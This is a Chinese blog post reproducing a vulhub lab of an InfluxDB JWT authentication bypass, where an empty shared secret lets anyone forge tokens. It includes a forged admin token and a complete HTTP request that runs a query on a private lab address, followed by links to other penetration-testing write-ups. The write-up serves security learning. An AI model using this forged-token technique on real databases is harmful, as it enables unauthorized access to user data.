vulhub漏洞复现28_Influxdb

最新推荐文章于 2023-07-18 20:01:17 发布
最新推荐文章于 2023-07-18 20:01:17 发布
阅读量723 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122772544
版权

influxdb未授权访问漏洞

漏洞原理

influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但未设置参数`shared-secret`的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。

漏洞环境

192.168.4.10_ubuntu

执行如下命令启动influxdb 1.6.6:

#docker-compose up -d

环境启动后,访问`http://your-ip:8086/debug/vars`即可查看一些服务信息

漏洞复现

1. 我们借助<https://jwt.io/>来生成jwt token:

```

{

  "alg": "HS256",

  "typ": "JWT"

}

{

  "username": "admin",

  "exp": 1738503632

}

```

其中,`admin`是一个已经存在的用户,`exp`是一个时间戳,代表着这个token的过期时间,你需要设置为一个未来的时间戳。

最终生成的token:

 

 2. 发送带有这个jwt token的数据包,可见SQL语句执行成功:

```

POST /query HTTP/1.1

Host: 192.168.4.10:8086

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzM4NTAzNjMyfQ._QHZ9SaPRyK1j0DiobEYjCcAHcv2ANEkORdbb1jSv8g

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 24

db=sample&q=show+users

```

 

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub漏洞 CVE-2016-3088
03-14
vulhub漏洞 CVE-2016-3088
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
hyjcking的博客
12-01 1293
今天这台靶机涉及的知识点非常全面 1.有文件上传漏洞 2.基于cookie的sql注入漏洞 3.sqlmap的使用 4.用kali自带的木马生成工具weevely生成绕waf的一句话木马 5.使用绕waf的木马和普通gif结合生成gif图片木马, 6.使用knock敲开隐藏的服务器端口, 7.使用ltrace函数跟踪进程的库函数调用从而得到正确id, 8.用msfvenom生成一个针对性的shellcode然后对目标服务器端口进行缓冲区溢出攻击从而得到root权限
No.8-VulnHub-IMF: 1-Walkthrough渗透学习
qq_34801745的博客
01-06 2711
** VulnHub-IMF: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志...
vulhub - IMF writeup
Jiajiajiang_的博客
04-16 2309
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/imf/IMF.ova 准备工作: 下载.ova文件,直接双击即可安装成功。 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发IP。 发IP为10.0.3.131。 端口...
漏洞】node-exporter被检测/debug/vars泄漏信息漏洞
最新发布
Meepoljd的博客
07-18 2862
和之前的pprof类似,都是国产的安全工具扫出来的莫名其妙的东西,这次也是报的node-exporter存在这个漏洞,又归我处理。
vulnhub-IMF 靶机的上传和linux缓冲区溢出
冬萍子癸水
04-22 528
这篇文章暂时只记录上传和linux bof。。。。留我自己学习和记录 上传这里检测的挺严的。。。system passthru这些函数都能检测,即便是改文件为图片,加gif89在开头都没用。。。 这个时候用weevely很方便,加密了php函数代码。 创建go.php 然后密码是666.再把这个php文件改为gif文件 weevely generate 666 go.php mv go.ph...
小白的靶机-VulnHub-IMF
wo41ge的博客
12-24 325
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 目标:得到root权限&找到四个flag.txt 开机界面就是个这 确定靶机地址:192.168.86.172 发80端口 运行着Apache 直接上页面康康 这个选项 右键源代码发flag1 flag1{YWxsdGhlZmlsZXM=} 发这是一个base64的加密 进行解码 allthefiles 还有一个base64加密的标签 解码康康 这里有一个坑 他们三个 是连在一起的 只有
【甄选靶场】Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出)
人间体佐菲的博客
09-23 2749
Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出) 网络安全,信息安全,渗透测试
8-vulnHub-IMF
尼德霍格007
07-23 452
VulnHub-IMF 靶机地址: 目标:得到root权限&找到6个flag.txt 作者:尼德霍格007 时间:2021-7-23 信息收集 扫描目标主机 nmap -sP 192.168.21.0/24 扫描开放端口 发只开放了80端口,访问看看 flag1 在Contact Us页面源码中发flag1 flag1{YWxsdGhlZmlsZXM=} 大括号内是是一个base64值,解密一下 allthefiles 继续搜索看看还有没有base64值,搜到还有,继续解码 flag
VulnHub-IMF-靶机渗透学习
嗯嗯呐的博客
11-26 2777
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志都包含下一个标志的提示。我希望您喜欢这个虚拟机并学到一些东西。 目标:得到root权限&找到六个flag.txt 作者:嗯嗯呐 目录信息收集PHP数组绕过getshell缓冲区溢出提权总结 信息收集 Nmap
Vulnhub-GlasgowSmile:v-1.1
cr7lyl的博客
12-25 1905
记一次vulnhub的通关过程 对主机全面扫描: 只有22和80端口开启 然后对其进行目录扫描,在扫描时访问web服务(8.
【渗透测试】VulnHub-IMF: 1
m0_52923241的博客
12-05 526
VulnHub-IMF: 1VulnHub-IMF: 1渗透思路小知识点一、php中使用url传递数组的方法二、sqlmap用到的参数理解三、文件上传提权四、缓冲区溢出常用工具一、weevely:(Linux菜刀)php webshell的安全测试工具二、ltrace:跟踪进程调用库函数的情况工具 VulnHub-IMF: 1渗透思路 参考文章:VulnHub-IMF: 1渗透测试详细流程 参考文章:VulnHub-IMF: 1渗透测试详细流程 渗透思路: 第一步,还是nmap扫ip,端口,开放80端口,访
vulnhub-MIF
HEAVEN569的博客
02-14 419
MIF 靶机下载链接: https://download.vulnhub.com/imf/IMF.ova 1.信息收集 查看靶机的ip地址,及开放的端口 nmap -sC -sS -sV 10.7.184.0/24 ip:10.7.184.162 80端口 http服务打开了 可以使用浏览器连接服务器 使用gobuster 进行目录扫描 root@kali:/usr/share/seclists/Discovery# gobuster dir -w /usr/s...
靶机渗透测试(IMF)
@小张小张的博客
09-29 2735
靶机渗透测试(IMF): Vulnhub靶机 IMF 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 靶机ip:192.168.10.29 2. nmap进行靶机端口服务扫描
InfluxDB 未授权访问漏洞
weixin_52125240的博客
03-16 9757
InfluxDB 未授权访问漏洞 前言:第一次漏洞,肯定会有很多不足的地方,这也是
vulhub mq
05-01
Vulhub MQ主要是通过在Vulhub平台上搭建RabbitMQ服务器,然后模拟实际攻击行为,测试服务器是否存在漏洞,并尝试利用漏洞获取对服务器的控制权限。 首先需要下载并运行Vulhub容器,并在容器中下载安装RabbitMQ服务器。接着可以使用模拟攻击工具,如Metasploit、amqp-bunny等工具,利用已知漏洞或弱点向服务器发起攻击,并收集攻击结果和响应信息。 例如,可以尝试通过未授权访问漏洞,获取到服务器的配置信息和证书文件;或者利用强制广播攻击,将恶意代码注入服务器,获取对服务器的访问权限,并控制服务器进行任意操作。 在进行测试前,需要完善测试计划和检查清单,确认测试环境搭建是否成功,并进行安全性评估和漏洞扫描,避免因测试过程中的错误操作,导致服务器系统瘫痪或泄漏敏感信息,造成不必要的损失。 总之,Vulhub MQ 是对RabbitMQ服务器进行安全性测试的重要方法,可有效提升服务器的安全性,保障应用程序正常运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值